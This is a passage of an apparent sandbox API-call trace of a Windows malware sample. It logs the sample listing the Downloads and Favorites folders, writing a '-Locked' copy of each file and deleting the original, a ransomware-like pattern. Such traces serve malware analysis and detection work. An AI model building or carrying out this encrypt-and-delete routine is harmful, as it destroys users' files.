ftCreationTime.dwLowDateTime=0xc9764700, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x34b71006, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34b71006, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0302.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0f0) returned 1 [0302.524] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Documents\\i3bdpGM-nK_y" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i3bdpgm-nk_y")) returned 0 [0302.525] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0302.525] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0302.525] CoTaskMemFree (pv=0x73f0b8) [0302.527] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads", lpFilePart=0x0) returned 0x1f [0302.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.527] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads", lpFilePart=0x0) returned 0x1f [0302.527] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", lpFilePart=0x0) returned 0x20 [0302.527] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.527] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.528] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.528] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0302.528] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.528] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads", lpFilePart=0x0) returned 0x1f [0302.528] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads\\", lpFilePart=0x0) returned 0x20 [0302.529] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.529] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.529] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.529] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0302.529] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.530] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini-Locked", lpFilePart=0x0) returned 0x32 [0302.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.530] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.530] GetFileType (hFile=0x49c) returned 0x1 [0302.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.530] GetFileType (hFile=0x49c) returned 0x1 [0302.540] CloseHandle (hObject=0x49c) returned 1 [0302.541] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini", lpFilePart=0x0) returned 0x2b [0302.541] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini")) returned 1 [0302.541] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\.", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites", lpFilePart=0x0) returned 0x1f [0302.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.542] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites", lpFilePart=0x0) returned 0x1f [0302.542] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", lpFilePart=0x0) returned 0x20 [0302.542] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.542] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.542] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43053b43, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43053b43, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0302.542] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0302.543] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0 [0302.543] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0302.543] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites", lpFilePart=0x0) returned 0x1f [0302.543] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", lpFilePart=0x0) returned 0x20 [0302.543] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.544] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.548] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43053b43, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43053b43, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0302.548] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.548] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0302.549] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0302.549] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0302.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0302.549] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url-Locked", lpFilePart=0x0) returned 0x2f [0302.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.549] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\bing.url-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.561] GetFileType (hFile=0x49c) returned 0x1 [0302.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.562] GetFileType (hFile=0x49c) returned 0x1 [0302.565] CloseHandle (hObject=0x49c) returned 1 [0302.568] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url", lpFilePart=0x0) returned 0x28 [0302.568] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\bing.url")) returned 1 [0302.578] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini-Locked", lpFilePart=0x0) returned 0x32 [0302.578] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0302.581] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0302.591] GetFileType (hFile=0x49c) returned 0x1 [0302.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0302.591] GetFileType (hFile=0x49c) returned 0x1 [0302.592] CloseHandle (hObject=0x49c) returned 1 [0302.593] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini", lpFilePart=0x0) returned 0x2b [0302.593] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini")) returned 1 [0302.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0302.594] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", lpFilePart=0x0) returned 0x25 [0302.594] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\", lpFilePart=0x0) returned 0x26 [0302.594] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.594] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.595] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43079e90, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.595] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0302.595] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0302.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0302.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af11c) returned 1 [0302.595] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x1aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", lpFilePart=0x0) returned 0x25 [0302.595] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\", nBufferLength=0x105, lpBuffer=0x1aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\", lpFilePart=0x0) returned 0x26 [0302.596] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*", lpFindFileData=0x1aee44 | out: lpFindFileData=0x1aee44*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0302.596] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.596] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43079e90, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.596] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43079e90, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0302.596] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0302.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0302.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0302.597] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini-Locked", lpFilePart=0x0) returned 0x38 [0302.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0302.597] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\desktop.ini-locked"), 